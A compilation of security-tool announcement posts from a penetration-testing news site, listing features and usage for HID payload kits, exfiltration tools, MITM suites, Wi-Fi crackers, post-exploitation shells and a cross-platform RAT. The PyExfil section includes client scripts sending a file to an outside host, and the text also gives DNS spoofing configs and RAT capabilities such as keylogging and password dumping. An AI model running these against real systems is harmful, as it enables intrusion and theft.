Kautilya is a human interface device hacking toolkit which provides various payloads for HIDs which may help with breaking into a computer during penetration tests.

The Windows payloads and modules are written mostly in powershell (in combination with native commands) and are tested on Windows 7 and Windows 8. In principal Kautilya should work with any HID capable of acting as a keyboard. Kautilya has been tested on Teensy++ 2.0 and Teensy 3.0 from pjrc.com.

Payloads Available

Windows

• Gather
• Gather Information
• Hashdump and Exfiltrate
• Keylog and Exfiltrate
• Sniffer
• WLAN keys dump
• Get Target Credentials
• Dump LSA Secrets
• Dump passwords in plain
• Copy SAM
• Dump Process Memory
• Dump Windows Vault Credentials
• Execute
• Download and Execute
• Connect to Hotspot and Execute code
• Code Execution using Powershell
• Code Execution using DNS TXT queries
• Download and Execute PowerShell Script
• Execute ShellCode
• Reverse TCP Shell
• Backdoor
• Sethc and Utilman backdoor
• Time based payload execution
• HTTP backdoor
• DNS TXT Backdoor
• Wireless Rogue AP
• Tracking Target Connectivity
• Gupt Backdoor
• Escalate
• Remove Update
• Forceful Browsing
• Manage
• Add an admin user
• Change the default DNS server
• Edit the hosts file
• Add a user and Enable RDP
• Add a user and Enable Telnet
• Add a user and Enable Powershell Remoting
• Drop Files
• Drop a MS Word File
• Drop a MS Excel File
• Drop a CHM (Compiled HTML Help) file
• Drop a Shortcut (.LNK) file
• Drop a JAR file

Misc

• Browse and Accept Java Signed Applet
• Speak on Target

Linux

• Download and Execute
• Reverse Shells using built in tools
• Code Execution
• DNS TXT Code Execution
• Perl reverse shell (MSF)

OSX

• Download and Execute
• DNS TXT Code Execution
• Perl Reverse Shell (MSF)
• Ruby Reverse Shell (MSF)

Usage

Run kautilya.rb and follow the menus. Kautilya asks for your inputs for various options. The generated payload is copied to the output directory of Kautilya.

The generated payload is an arduino sketch, ready to be used with Arduino IDE. Burn it to Human Interface Device of your choice and have fun!

You can download Kautilya here:

Kautilya-v0.5.5.zip

Or read more here.

The post Kautilya – Human Interface Device Hacking Toolkit appeared first on Darknet - The Darkside.

Netdiscover is a network address discovery tool that was developed mainly for those wireless networks without DHCP servers, though it also works on wired networks. It sends ARP requests and sniffs for replies.

Built on top of libnet and libpcap, it can passively detect on-line hosts, or search for them, by actively sending ARP requests, it can also be used to inspect your network ARP traffic, or find network addresses using auto scan mode, which will scan for common local networks

Requirements

• libpcap
• libnet > 1.1.2

Tested to work on Linux, Solaris MacOS X and OpenBSD, other *nix variants may work.

Usage

Usage: ./netdiscover [-i device] [-r range | -p] [-s time] [-n node] [-c count] [-f] [-S]

  -i device
    The network device to sniff at and inject packets. If no device was
    specified, first available will be used.

  -r range
    Scan a given range instead of auto scan. Valid range values are:
    192.168.0.0/24, 192.168.0.0/16 or 192.168.0.0/8

  -p
    Enable passive mode do not send anything, only sniff

  -s time
    It will sleep given time in milliseconds between each arp request
    injection. (default 1)

  -c count
    Number of times to send each arp reques. Usefull for networks with
    packet loss, so it will scan given times for each host.

  -n node
    Last ip octet used for scanning as source host, you can change it
    if the default host is already used (from 2 to 253) (default 66)

  -S
    Enable sleep time supression betwen each request. I will sleep each 255
    scanned hosts instead of do it by each one, this mode was used on 0.3 beta4
    and older releases. Avoid this option on networks with packet lossing,
    or in wireless networks with low signal level. (also called hardcore mode)

  -f
    Enable fastmode scan, it will only scan for hosts .1, .100, .254 on each
    network, usefull when searching for addresses being used, after find one
    you can make a specific range scan to see online boxes.
    Scanned hosts can be easily modified at fast_ips[] array on main.c source.

If -p or -r options are not used, netdiscover will automatically scan for common
lan addresses. Those address lists can be modified at common_net[] on main.c

Build

$ sh update-oui-database.sh (optional)
$ ./configure
$ make
# make install

You can download Netdiscover here:

netdiscover-master.zip

Or read more here.

The post Netdiscover – Network Address Discovery Tool appeared first on Darknet - The Darkside.

PyExfil started as a Proof of Concept (PoC) and has ended up turning into a Python Data Exfiltration toolkit, which can execute various techniques based around commonly allowed protocols (HTTP, ICMP, DNS etc).

The package is very early stage (alpha release) so is not fully tested, any feedback and commits are welcomed by the author.

Features

Currently PyExfil supports:

• DNS query
• HTTP Cookie
• ICMP (8)
• NTP requests
• BGP Open
• POP3 Authentication (as password)
• FTP MKDIR technique

Usage

HTTP Exfilatration Server

#!/usr/bin/python
from exfiltration.http_exfiltration import *
def main():
    print "Starting a listener: "
    listen("127.0.0.1", 80)

if __name__ == "__main__":
    main()

HTTP Exfiltration Client

#!/usr/bin/python

from exfiltration.http_exfiltration import *

def main():
    FILE_TO_EXFIL = "/bin/bash"
    ADDR = "www.morirt.com"

    if send_file(ADDR, FILE_TO_EXFIL) == 0:
        print "File exfiltrated okay."
    else:
        print "Damn thing failed."

if __name__ == "__main__":
    main()

ICMP Server

#!/usr/bin/python

from exfiltration.icmp_exfiltration import *

def main():
    ADDR = "127.0.0.1"
    TMP_PATH = "/tmp/"

    init_listener(ADDR, TMP_PATH)

if __name__ == "__main__":
    main()

ICMP Exfiltrator

#!/usr/bin/python

from exfiltration.icmp_exfiltration import *

def main():
    FILE_TO_EXFIL = "/bin/bash"
    ADDR = "www.morirt.com"

    if send_file(ADDR, FILE_TO_EXFIL) == 0:
        print "File exfiltrated okay."
    else:
        print "Damn thing failed."

if __name__ == "__main__":
    main()

You can download PyExfil here:

PyExfil-v0.1-alpha.zip

Or read more here.

The post PyExfil – Python Data Exfiltration Tools appeared first on Darknet - The Darkside.

HexorBase is a database application designed to administer and to audit multiple database servers simultaneously from a centralised location, it is capable of performing SQL queries and brute-force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL).

It allows packet routing through proxies or even Metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

Requirements

• python
• python-qt4
• cx_Oracle
• python-mysqldb
• python-psycopg2
• python-pymssql
• python-qscintilla2

You can download HexorBase here:

hexorbase_1.0_all.deb

Or read more here.

The post HexorBase – Administer & Audit Multiple Database Servers appeared first on Darknet - The Darkside.

sslscan is a very efficient C program that allows you to detect SSL versions & cipher suites (including TLS) and also checks for vulnerabilities like Heartbleed and POODLE.

A useful tool to keep around after you’ve set-up a server to check the SSL configuration is robust. Especially if you’re in an Internet limited environment and you can’t use an Online tool like the excellent Qualsys SSL Labs – https://www.ssllabs.com/ssltest/

Features

sslscan has fairly complete support to detect all versions and ciphers for both SSL and TLS, including vulnerabilities (like Heartbleed and Poodle).

• Highlight SSLv2 and SSLv3 ciphers in output.
• Highlight CBC ciphers on SSLv3 (POODLE).
• Highlight 3DES and RC4 ciphers in output.
• Highlight PFS+GCM ciphers as good in output.
• Check for OpenSSL HeartBleed (CVE-2014-0160).
• Flag expired certificates.
• Flag weak DHE keys with OpenSSL >= 1.0.2.
• Experimental Windows & OS X support.
• Support for scanning PostgreSQL servers.
• StartTLS support for LDAP.

Usage

Command:
[Options] [host:port | host]

Options:
--targets=<file>       A file containing a list of hosts to check.
		       Hosts can  be supplied  with ports (host:port)
--sni-name=<name>      Hostname for SNI
--ipv4                 Only use IPv4
--ipv6                 Only use IPv6
--show-certificate     Show full certificate information
--no-check-certificate    Don't warn about weak certificate algorithm or keys
--show-client-cas      Show trusted CAs for TLS client auth
--show-ciphers         Show supported client ciphers
--show-cipher-ids      Show cipher ids
--show-times           Show handhake times in milliseconds
--ssl2                 Only check SSLv2 ciphers
--ssl3                 Only check SSLv3 ciphers
--tls10                Only check TLSv1.0 ciphers
--tls11                Only check TLSv1.1 ciphers
--tls12                Only check TLSv1.2 ciphers
--tlsall               Only check TLS ciphers (all versions)
--ocsp                 Request OCSP response from server
--pk=<file>            A file containing the private key or a PKCS#12 file
                       containing a private key/certificate pair
--pkpass=<password>    The password for the private  key or PKCS#12 file
--certs=<file>         A file containing PEM/ASN1 formatted client certificates
--no-ciphersuites      Do not check for supported ciphersuites
--no-fallback          Do not check for TLS Fallback SCSV
--no-renegotiation     Do not check for TLS renegotiation
--no-compression       Do not check for TLS compression (CRIME)
--no-heartbleed        Do not check for OpenSSL Heartbleed (CVE-2014-0160)
--starttls-ftp         STARTTLS setup for FTP
--starttls-imap        STARTTLS setup for IMAP
--starttls-irc         STARTTLS setup for IRC
--starttls-ldap        STARTTLS setup for LDAP
--starttls-pop3        STARTTLS setup for POP3
--starttls-smtp        STARTTLS setup for SMTP
--starttls-xmpp        STARTTLS setup for XMPP
--starttls-psql        STARTTLS setup for PostgreSQL
--xmpp-server          Use a server-to-server XMPP handshake
--http                 Test a HTTP connection
--rdp                  Send RDP preamble before starting scan
--bugs                 Enable SSL implementation bug work-arounds
--timeout=<sec>        Set socket timeout. Default is 3s
--sleep=<msec>         Pause between connection request. Default is disabled
--xml=<file>           Output results to an XML file
                       <file> can be -, which means stdout
--version              Display the program version
--verbose              Display verbose output
--no-cipher-details    Disable EC curve names and EDH/RSA key lengths output
--no-colour            Disable coloured output
--help                 Display the  help text  you are  now reading

You can download sslscan here:

sslscan-1.11.0-rbsec.tar.gz

Or read more here.

The post sslscan – Detect SSL Versions & Cipher Suites (Including TLS) appeared first on Darknet - The Darkside.

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

The Software runs on any Linux machine with prerequisites installed, and it has been tested on Ubuntu KDE/Gnome, BackTrack Linux and BackBox Linux.

Features

Fern currently supports:

• WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
• WPA/WPA2 Cracking with Dictionary or WPS based attacks
• Automatic saving of key in database on successful crack
• Automatic Access Point Attack System
• Session Hijacking (Passive and Ethernet Modes)
• Access Point MAC Address Geo Location Tracking
• Internal MITM Engine
• Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
• Update Support

Prerequisites

Fern requires the following to run properly:

• Aircrack-NG
• Python-Scapy
• Python Qt4
• Python
• Subversion
• Xterm
• Reaver (for WPS Attacks)
• Macchanger

You can download Fern here:

fern-wifi-cracker-v2.4.zip

Or read more here.

The post Fern Wifi Cracker – Wireless Security Auditing Tool appeared first on Darknet - The Darkside.

dnsteal is a DNS exfiltration tool, essentially a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

dnsteal is coded in Python and is available on Github.

Features

dnsteal currently has:

• Support for multiple files
• Gzip compression supported
• Supports the customisation of subdomains
• Customise bytes per subdomain and the length of filename

Usage

# cd dnsteal/
# ./dnsteal.py -h
 
      ___  _  _ ___ _            _ 
     |   \| \| / __| |_ ___ __ _| |
     | |) | .` \__ \  _/ -_) _` | |
     |___/|_|\_|___/\__\___\__,_|_|v2.0

-- https://github.com/m57/dnsteal.git --

Stealthy file extraction via DNS requests

Usage: python ./dnsteal.py [listen_address] [options]

Options:
        -z      Unzip incoming files.
        -v      Verbose output.
        -h      This help menu

Advanced:
        -b      Bytes to send per subdomain                 (default = 57, max=63)
        -s      Number of data subdomains per request       (default =  4, ie. $data.$data.$data.$data.$filename)
        -f      Length reserved for filename per request    (default = 17)

$ python ./dnsteal.py -z 127.0.0.1

-------- Do not change the parameters unless you understand! --------

The query length cannot exceed 253 bytes. This is including the filename.
The subdomains lengths cannot exceed 63 bytes.

Advanced: 
        ./dnsteal.py 127.0.0.1 -z -s 4 -b 57 -f 17      4 subdomains, 57 bytes => (57 * 4 = 232 bytes) + (4 * '.' = 236). Filename => 17 byte(s)
        ./dnsteal.py 127.0.0.1 -z -s 4 -b 55 -f 29      4 subdomains, 55 bytes => (55 * 4 = 220 bytes) + (4 * '.' = 224). Filename => 29 byte(s)
        ./dnsteal.py 127.0.0.1 -z -s 4 -b 63 -f  1      4 subdomains, 63 bytes => (62 * 4 = 248 bytes) + (4 * '.' = 252). Filename =>  1 byte(s)


#

You can download dnsteal here:

dnsteal.py

Or read more here.

The post dnsteal – DNS Exfiltration Tool appeared first on Darknet - The Darkside.

Ettercap is a comprehensive suite for man-in-the-middle attacks (MiTM). It features sniffing of live connections, content filtering on the fly and many other interesting tricks.

It also supports active and passive dissection of many protocols and includes many features for network and host analysis.

Ettercap works by putting the network interface into promiscuous mode and by ARP poisoning the target machines. Thereby it can act as a ‘man in the middle’ and unleash various attacks on the victims. Ettercap has plugin support so that the features can be extended by adding new plugins.

Features

Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap offers four modes of operation:

• IP-based: packets are filtered based on IP source and destination.
• MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway.
• ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex).
• PublicARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex).

In addition, the software also offers the following features:

• Character injection into an established connection: characters can be injected into a server (emulating commands) or to a client (emulating replies) while maintaining a live connection.
• SSH1 support: the sniffing of a username and password, and even the data of an SSH1 connection. Ettercap is the first software capable of sniffing an SSH connection in full duplex.
• HTTPS support: the sniffing of HTTP SSL secured data—even when the connection is made through a proxy.
• Remote traffic through a GRE tunnel: the sniffing of remote traffic through a GRE tunnel from a remote Cisco router, and perform a man-in-the-middle attack on it.
• Plug-in support: creation of custom plugins using Ettercap’s API.
• Password collectors for: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG
• Packet filtering/dropping: setting up a filter that searches for a particular string (or hexadecimal sequence) in the TCP or UDP payload and replaces it with a custom string/sequence of choice, or drops the entire packet.
• OS fingerprinting: determine the OS of the victim host and its network adapter.
• Kill a connection: killing connections of choice from the connections-list.
• Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.
• Hijacking of DNS requests.
• Ettercap also has the ability to actively or passively find other poisoners on the LAN.

Usage

The options are as follows:

Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IPs/PORTs (see the man for further detail)

Sniffing and Attack options:
-M, --mitm <METHOD:ARGS> perform a mitm attack
-o, --only-mitm don't sniff, only perform the mitm attack
-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)
-p, --nopromisc do not put the iface in promisc mode
-u, --unoffensive do not forward packets
-r, --read <file> read data from pcapfile <file>
-f, --pcapfilter <string> set the pcap filter <string>
-R, --reversed use reversed TARGET matching
-t, --proto <proto> sniff only this proto (default is all)

User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
-s, --script <CMD> issue these commands to the GUI
-C, --curses use curses GUI
-G, --gtk use GTK+ GUI
-D, --daemon daemonize ettercap (no GUI)

Logging options:
-w, --write <file> write sniffed data to pcapfile <file>
-L, --log <logfile> log all the traffic to this <logfile>
-l, --log-info <logfile> log only passive infos to this <logfile>
-m, --log-msg <logfile> log all the messages to this <logfile>
-c, --compress use gzip compression on log files

Visualization options:
-d, --dns resolves ip addresses into hostnames
-V, --visual <format> set the visualization format
-e, --regex <regex> visualize only packets matching this regex
-E, --ext-headers print extended header for every pck
-Q, --superquiet do not display user and password

General options:
-i, --iface <iface> use this network interface
-I, --iflist show all the network interfaces
-n, --netmask <netmask> force this <netmask> on iface
-P, --plugin <plugin> launch this <plugin>
-F, --filter <file> load the filter <file> (content filter)
-z, --silent do not perform the initial ARP scan
-j, --load-hosts <file> load the hosts list from <file>
-k, --save-hosts <file> save the hosts list to <file>
-W, --wep-key <wkey> use this wep key to decrypt wifi packets
-a, --config <config> use the alterative config file <config>

Standard options:
-U, --update updates the databases from ettercap website
-v, --version prints the version and exit
-h, --help this help screen

Dependencies

Ettercap source compilation requires the following dependencies:

• Libpcap & dev libraries
• Libnet1 & dev libraries
• Libpthread & dev libraries
• Zlibc
• Libtool
• CMake 2.6
• Flex
• Bison
• LibSSL & dev libraries
• LibGTK & dev libraries
• Libncurses & dev libraries
• Libpcre & dev libraries

You can download Ettercap here:

ettercap-v0.8.2.tar.gz (Includes dependencies)

Or read more here.

The post Ettercap – A Suite For Man-In-The-Middle Attacks appeared first on Darknet - The Darkside.

DAVScan is a quick and lightweight WebDAV security scanner designed to discover hidden files and folders on DAV enabled web servers. The scanner works by taking advantage of overly privileged/misconfigured WebDAV servers or servers vulnerable to various disclosure or authentication bypass vulnerabilities.

The scanner attempts to fingerprint the target server and then spider the server based on the results of a root PROPFIND request.

Features

• Server header fingerprinting – If the webserver returns a server header, davscan can search for public exploits based on the response.
• Basic DAV scanning with PROPFIND – Quick scan to find anything that might be visible from DAV.
• Unicode Auth Bypass – Works using GET haven’t added PROPFIND yet. Not fully tested so double check the work.
• Exclusion of DoS exploit results – You can exclude denial of service exploits from the searchsploit results.
• Exclusion of MSF modules from exploit results – Custom searchsploit is included in the repo for this. Either overwrite existing searchsploit or backup and replace. This feature may or may not end up in the real searchsploit script.

Usage

davscan.py [-h] -H HOST [-p PORT] [-a AUTH] [-u USER] [-P PASSWORD] [-o OUTFILE] [-d ] [-m ]

-H HOST, --host HOST hostname or IP address of web server; -h foo.com

optional arguments:

-h, --help show this help message and exit
-p PORT, --port PORT port to connect to the host on (defaults to port 80); -p 80
-a AUTH, --auth AUTH Basic authentication required; -a basic
-u USER, --user USER user; -u derp
-P PASSWORD, --password PASSWORD password for user; -P 'hunter2'
-o OUTFILE, --out OUTFILE output file. defaults to /tmp/davout; -o /foo/bar
-d, --no-dos exclude DoS results from searchploit.
-m, --no-msf exclude MSF modules from results.

You can download DAVScan here:

davscan-master.zip

Or read more here.

The post DAVScan – WebDAV Security Scanner appeared first on Darknet - The Darkside.

Fluxion is an automated EvilAP attack tool for carrying out MiTM attacks on WPA Wireless networks written in a mix of Bash and Python.

Fluxion is heavily based off Linset the Evil Twin Attack Bash Script, with some improvements and bug-fixes.

How it Works

• Scan the networks.
• Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password)
• Use WEB Interface *
• Launch a FakeAP instance to imitate the original access point
• Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
• A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted

Dependencies

1. Aircrack : 1:1.2-0~rc4-0parrot0
2. Lighttpd : 1.439-1
3. Hostapd : 1:2.3-2.3

You can download Fluxion here:

– Latest Stable: fluxion-0.22.zip
– Pre-release: fluxion-0.23.zip

Or read more here.

The post Fluxion – Automated EvilAP Attack Tool appeared first on Darknet - The Darkside.

p0wnedShell is an offensive PowerShell Runspace Post Exploitation host application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell run space environment (.NET). It has a lot of offensive PowerShell modules and binaries included making the process of Post Exploitation easier.

What the author tried was to build an “all in one” Post Exploitation tool which could be used to bypass all mitigations solutions (or at least some of), and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defence strategies.

Features/Modules

The following PowerShell tools/functions are included:

• PowerSploit Invoke-Shellcode
• PowerSploit Invoke-ReflectivePEInjection
• PowerSploit Invoke-Mimikatz
• PowerSploit Invoke-TokenManipulation
• PowerSploit PowerUp
• PowerSploit PowerView
• HarmJ0y’s Invoke-Psexec
• Besimorhino’s PowerCat
• Nishang Invoke-PsUACme
• Nishang Invoke-Encode
• Nishang Get-PassHashes
• Nishang Invoke-CredentialsPhish
• Nishang Port-Scan
• Nishang Copy-VSS
• Kevin Robertson Invoke-Inveigh
• Kevin Robertson Tater
• FuzzySecurity Invoke-MS16-032

Powershell functions within the Runspace are loaded in memory from Base64 encode strings.

The following Binaries/tools are included:

• Benjamin DELPY’s Mimikatz
• Benjamin DELPY’s MS14-068 kekeo Exploit
• Didier Stevens modification of ReactOS Command Prompt
• MS14-058 Local SYSTEM Exploit
• hfiref0x MS15-051 Local SYSTEM Exploit

Compiling

To compile p0wnedShell you need to import this project into Microsoft Visual Studio or if you don’t have access to a Visual Studio installation, you can compile it as follows:

To Compile as x86 binary:

cd \Windows\Microsoft.NET\Framework\v4.0.30319

csc.exe /unsafe /reference:"C:\p0wnedShell\System.Management.Automation.dll" /reference:System.IO.Compression.dll /win32icon:C:\p0wnedShell\p0wnedShell.ico /out:C:\p0wnedShell\p0wnedShellx86.exe /platform:x86 "C:\p0wnedShell\*.cs"

To Compile as x64 binary:

cd \Windows\Microsoft.NET\Framework64\v4.0.30319

csc.exe /unsafe /reference:"C:\p0wnedShell\System.Management.Automation.dll" /reference:System.IO.Compression.dll /win32icon:C:\p0wnedShell\p0wnedShell.ico /out:C:\p0wnedShell\p0wnedShellx64.exe /platform:x64 "C:\p0wnedShell\*.cs"

p0wnedShell uses the System.Management.Automation namespace, so make sure you have the System.Management.Automation.dll within your source path when compiling outside of Visual Studio.

You can download p0wnedShell here:

p0wnedShell-master.zip

Or read more here.

The post p0wnedShell – PowerShell Runspace Post Exploitation Toolkit appeared first on Darknet - The Darkside.

ZGrab is a Go-based application layer scanner that operates with ZMap and supports multiple protocols and services including TLS, IMAP, SMTP, POP3 etc.

It also stores TLS version and can detect Heartbleed.

Building

You will need to have a valid $GOPATH set up, for more information about $GOPATH, see https://golang.org/doc/code.html.

Once you have a working $GOPATH, run:

go get github.com/zmap/zgrab

This will install zgrab under $GOPATH/src/github.com/zmap/zgrab

$ cd $GOPATH/src/github.com/zmap/zgrab
$ go build

Usage

zgrab [-banners] [-ca-file file ] [-cbc-only] [-data message ] [-ehlo]
       domain ] [-encoding encoding ] [-heartbleed] [-imap] [-input-file  file
       ]  [-interface  interface  ]  [-log-file  file ] [-metadata-file file ]
       [-modbus] [-output-file file ] [-pop3] [-port port ] [-senders  senders
       ]  [-smtp]  [-smtp-help]  [-starttls] [-timeout timeout ] [-tls] [-tls-
       version version ] [-udp]

Example:

# zmap -p 443 --output-fields=* | ztee results.csv | zgrab --port 443 --tls --http="/" --output-file=banners.json

You can download ZGrab here:

zgrab-v0.0.1.zip

Or read more here.

The post ZGrab – Application Layer Scanner For ZMap appeared first on Darknet - The Darkside.

icmpsh is a simple ICMP reverse shell with a win32 slave and a POSIX-compatible master in C, Perl or Python. The main advantage over the other similar open source tools is that it does not require administrative privileges to run onto the target machine.

The tool is clean, easy and portable. The slave (client) runs on the target Windows machine, it is written in C and works on Windows only whereas the master (server) can run on any platform on the attacker machine as it has been implemented in C and Perl by and this port is in Python.

Features

• Open source software.
• Client/server architecture.
• The master is portable across any platform that can run either C, Perl or Python code.
• The target system has to be Windows because the slave runs on that platform only for now.
• The user running the slave on the target system does not require administrative privileges.

sysctl -w net.ipv4.icmp_echo_ignore_all=1

-t host            host ip address to send ping requests to. This option is mandatory!

-r                 send a single test icmp request containing the string "Test1234" and then quit. 
                   This is for testing the connection.

-d milliseconds    delay between requests in milliseconds 

-o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                   The counter is set back to 0 if a response was received.

-b num             limit of blanks (unanswered icmp requests before quitting

-s bytes           maximal data buffer size in bytes

dns2proxy is an offensive DNS server that offers various features for post-exploitation once you’ve changed the DNS server of a victim.

It’s very frequently used in combination with sslstrip.

Features

• Traditional DNS Spoofing
• Implements DNS Spoofing via Forwarding
• Detects and corrects changes for sslstrip to work

Usage

Using the spoof.cfg config file with the format:

hostname ip.ip.ip.ip

root@kali:~/dns2proxy# echo "www.s21sec.com 1.1.1.1" > spoof.cfg

// launch in another terminal dns2proxy.py

root@kali:~/dns2proxy# nslookup www.s21sec.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: www.s21sec.com
Address: 1.1.1.1
Name: www.s21sec.com
Address: 88.84.64.30

Or you can use domains.cfg file to spoof all hosts of a domain (wildcard):

root@kali:~/demoBH/dns2proxy# cat dominios.cfg
.domain.com 192.168.1.1

root@kali:~/demoBH/dns2proxy# nslookup aaaa.domain.com 127.0.0.1
Server: 127.0.0.1
Address: 127.0.0.1#53

Name: aaaa.domain.com
Address: 192.168.1.1

Hostnames at nospoof.cfg will not be spoofed.

Config Files

domains.cfg – resolve all hosts/subdomains for the listed domains with the given IP.

.facebook.com 1.2.3.4 .fbi.gov 1.2.3.4

spoof.cfg – Spoof a single host with a given IP.

www.nsa.gov 127.0.0.1

nospoof.cfg – Send always a legit response when responding for these hosts.

mail.google.com

nospoofto.cfg – Don’t send fake responses to the IPs listed there.

127.0.0.1 4.5.6.8

victims.cfg – If not empty, only send fake responses to these IP addresses.

23.66.163.36 195.12.226.131

resolv.conf DNS server to forward legitimate queries to.

nameserver 8.8.8.8

You can download dns2proxy here:

dns2proxy-master.zip

Or read more here.

The post dns2proxy – Offensive DNS server appeared first on Darknet - The Darkside.

OWASP VBScan short for vBulletin Vulnerability Scanner is an open-source project in Perl programming language to detect VBulletin CMS vulnerabilities and analyse them.

Features

VBScan currently has the following:

• Compatible with Windows, Linux & OSX
• Up to date exploit database
• Full path disclosure
• Firewall detect & bypass
• Version check
• Upgrade config finder
• Random user agent generator
• HTML Reports
• Backup finder

And more.

Usage

./vbscan.pl <target>

Example:

./vbscan.pl http://target.com/vbulletin

You can download VBScan here:

vbscan-0.1.7.1.zip

Or you can read more here.

The post OWASP VBScan – vBulletin Vulnerability Scanner appeared first on Darknet - The Darkside.

Webbies Toolkit is a pair of tools that enable asynchronous web recon & enumeration including SSL detection, banner grabbing and presence of login forms.

Webbies Features

• Respects scope (including redirects)
• Uses same DNS resolver for enumeration and retrieval by patching aiohttp TCPConnector
• Cached DNS requests by wrapping aiodns
• SSLContext can be modified for specific SSL versions
• Outputs a simple CSV for easy grep-fu of results
• Asynchronous http(s) and dns
• Specialized bingapi search on ip and hostname given bing key

FDB Features

• Fast directory/web application eumeration
• Dir bust numerous hosts simultaneously and save all results in a directory in a CSV file per host
• Task control to limit requests per second
• Multiple progress bars for current status on running FDB’s
• Include word list used, target, extensions, and start and stop times in CSV file
• 404 detection based on response structure and content

Usage

usage: classify.webbies.py [-h] [-A] [-b BING_KEY] [-g GNMAP] [-G GNMAPDIR]                                                                                                                                                                             
                           [-i INPUTLIST] [-n NESSUS] [-N NESSUSDIR]                                                                                                                                                                                    
                           [-o OUTPUT] [-R NAMESERVERS] [-s SCOPE]                                                                                                                                                                                      
                           [-T THREADS] [-u USERAGENTS] [-v] [-V]                                                                                                                                                                                       
                                                                                                                                                                                                                                                        
enumerate and display detailed information about web listeners                                                                                                                                                                                          
                                                                                                                                                                                                                                                        
optional arguments:                                                                                                                                                                                                                                     
  -h, --help            show this help message and exit                                                                                                                                                                                                 
  -A, --analyze         analyze web listeners responses and group according                                                                                                                                                                             
                        similarity                                                                                                                                                                                                                      
  -b BING_KEY, --bing_key BING_KEY                                                                                                                                                                                                                      
                        bing API key                                                                                                                                                                                                                    
  -g GNMAP, --gnmap GNMAP                                                                                                                                                                                                                               
                        gnmap input file                                                                                                                                                                                                                
  -G GNMAPDIR, --gnmapdir GNMAPDIR                                                                                                                                                                                                                      
                        Directory containing gnmap input files                                                                                                                                                                                          
  -i INPUTLIST, --inputList INPUTLIST                                                                                                                                                                                                                   
                        input file with hosts listed http(s)://ip:port/ or                                                                                                                                                                              
                        ip:port per line                                                                                                                                                                                                                
  -n NESSUS, --nessus NESSUS                                                                                                                                                                                                                            
                        nessus input file                                                                                                                                                                                                               
  -N NESSUSDIR, --nessusdir NESSUSDIR                                                                                                                                                                                                                   
                        Directory containing nessus files                                                                                                                                                                                               
  -o OUTPUT, --output OUTPUT                                                                                                                                                                                                                            
                        Output file. Supported types are csv. default is                                                                                                                                                                                
                        lastrun.csv                                                                                                                                                                                                                     
  -R NAMESERVERS, --nameservers NAMESERVERS                                                                                                                                                                                                             
                        Specify custom nameservers to resolve IP/hostname.                                                                                                                                                                              
                        Comma delimited                                                                                                                                                                                                                 
  -s SCOPE, --scope SCOPE                                                                                                                                                                                                                               
                        Scope file with IP Networks in CIDR format                                                                                                                                                                                      
  -T THREADS, --threads THREADS                                                                                                                                                                                                                         
                        Set the max number of threads.                                                                                                                                                                                                  
  -u USERAGENTS, --useragents USERAGENTS                                                                                                                                                                                                                
                        specifies file of user-agents to randomly use.                                                                                                                                                                                  
  -v, --verbosity       -v for regular output, -vv for debug level                                                                                                                                                                                      
  -V, --version         show program's version number and exit

You can download Webbies Toolkit here:

webbies-master.zip

Or read more here.

The post Webbies Toolkit – Web Recon & Enumeration Tools appeared first on Darknet - The Darkside.

Stitch is a cross-platform Python Remote Administration Tool, commonly known as a RAT. This framework allows you to build custom payloads for Windows, Mac OSX and Linux as well.

You are able to select whether the payload binds to a specific IP and port, listens for a connection on a port, option to send an email of system info when the system boots, and option to start keylogger on boot. Payloads created can only run on the OS that they were created on.

Features

Cross Platform Support

• Command and file auto-completion
• Antivirus detection
• Able to turn off/on display monitors
• Hide/unhide files and directories
• View/edit the hosts file
• View all the systems environment variables
• Keylogger with options to view status, start, stop and dump the logs onto your host system
• View the location and other information of the target machine
• Execute custom python scripts which return whatever you print to screen
• Screenshots
• Virtual machine detection
• Download/Upload files to and from the target system
• Attempt to dump the systems password hashes
• Payloads’ properties are “disguised” as other known programs

Windows Specific

• Display a user/password dialog box to obtain user password
• Dump passwords saved via Chrome
• Clear the System, Security, and Application logs
• Enable/Disable services such as RDP,UAC, and Windows Defender
• Edit the accessed, created, and modified properties of files
• Create a custom popup box
• View connected webcam and take snapshots
• View past connected wifi connections along with their passwords
• View information about drives connected
• View summary of registry values such as DEP

Mac OSX Specific

• Display a user/password dialog box to obtain user password
• Change the login text at the user’s login screen
• Webcam snapshots

Mac OSX/Linux Specific

• SSH from the target machine into another host
• Run sudo commands
• Attempt to bruteforce the user’s password using the passwords list found in Tools/
• Webcam snapshots? (untested on Linux)

